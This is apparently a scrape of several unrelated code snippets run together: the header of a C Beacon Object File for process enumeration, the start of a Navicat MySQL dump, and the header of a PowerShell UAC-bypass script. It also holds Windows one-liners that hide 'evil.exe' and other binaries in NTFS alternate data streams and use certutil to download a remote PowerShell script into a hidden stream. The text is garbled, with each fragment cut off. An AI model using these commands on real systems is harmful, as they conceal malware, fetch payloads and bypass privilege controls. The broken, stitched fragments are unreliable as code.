| #include <string.h> | |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| #include "beacon.h" | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
| DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
| DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| /* | |
| Navicat Premium Data Transfer | |
| Source Server : localhost | |
| Source Server Type : MySQL | |
| Source Server Version : 50542 | |
| Source Host : localhost | |
| Source Database : rule | |
| Target Server Type : MySQL |
| # Powershell script to bypass UAC on Vista+ assuming | |
| # there exists one elevated process on the same desktop. | |
| # Technical details in: | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
| # https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
| # You need to Install-Module NtObjectManager for this to run. | |
| Import-Module NtObjectManager |
| #!/bin/sh | |
| # | |
| # `7MN. `7MF' | |
| # __, MMN. M | |
| #`7MM M YMb M pd""b. | |
| # MM M `MN. M (O) `8b | |
| # MM M `MM.M ,89 | |
| # MM M YMM ""Yb. | |
| #.JMML..JML. YM 88 | |
| # (O) .M' |
